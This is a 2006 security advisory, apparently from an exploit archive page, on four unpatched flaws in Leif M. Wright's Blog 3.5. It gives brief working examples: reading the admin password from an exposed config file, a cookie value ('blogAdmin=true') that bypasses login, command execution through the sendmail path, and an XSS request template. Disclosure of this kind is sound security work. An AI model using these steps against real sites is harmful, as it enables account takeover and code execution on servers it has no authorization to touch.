EV0082.txt

EV0082.txt: Posted Mar 3, 2006; Authored by Aliaksandr Hartsuyeu | Site evuln.com; Leif M. Wright's Blog version 3.5 is susceptible to information disclosure, authentication bypass, code execution, and cross site scripting flaws. Exploit details provided.; tags | exploit, code execution, xss, info disclosure; advisories | CVE-2006-0843, CVE-2006-0844, CVE-2006-0845; SHA-256 | f39ddb0473140f0584760e53110a3ed5d4f6b2109e11e0b117609ca692e20054; Download | Favorite | View

EV0082.txt

New eVuln Advisory:
Leif M. Wright's Blog Multiple Vulnerabilities
http://evuln.com/vulns/82/summary.html

--------------------Summary----------------
eVuln ID: EV0082
CVE: CVE-2006-0843 CVE-2006-0844 CVE-2006-0845 CVE-2006
Software: Leif M. Wright's Blog
Sowtware's Web Site: http://leifwright.com/scripts/
Versions: 3.5
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-----------------Description---------------
1. Sensitive Information Disclosure and Authentication Bypass

All "txt" files isn't protected by htaccess(or any other ways) in default installiation. This can be used to retrieve administrator's password from config file.


2. Cookie Authentication Bypass

"blog.cgi" script dont make password comparisson when identifying administrator by cookie.


3. Shell Command Execution

Administrator has an ability to edit blog configuration including full path to sendmail program. This can be used to execute arbitrary shell commands.

System access is possible.


4. 'Referer' and 'User-Agent' Cross-Site Scripting

Environment variables HTTP_REFERER and HTTP_USER_AGENT are not properly sanitized. This can be used to post HTTP query with fake Referer or User-Agent values which may contain arbitrary html or script code. This code will be executed when administrator will open "Log" page.


--------------Exploit----------------------
Available at: http://evuln.com/vulns/82/exploit.html

1. Sensitive Information Disclosure and Authentication Bypass

Url example:
http://[host]/cgi-bin/blog/blogconfig.txt


2. Cookie Authentication Bypass

Cookie: blogAdmin=true


3. Shell Command Execution

Sendmail: /bin/ls


4. 'Referer' and 'User-Agent' Cross-Site Scripting


GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter% 20my%20comment
  


--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

EV0082.txt

EV0082.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EV0082.txt

Share This

EV0082.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems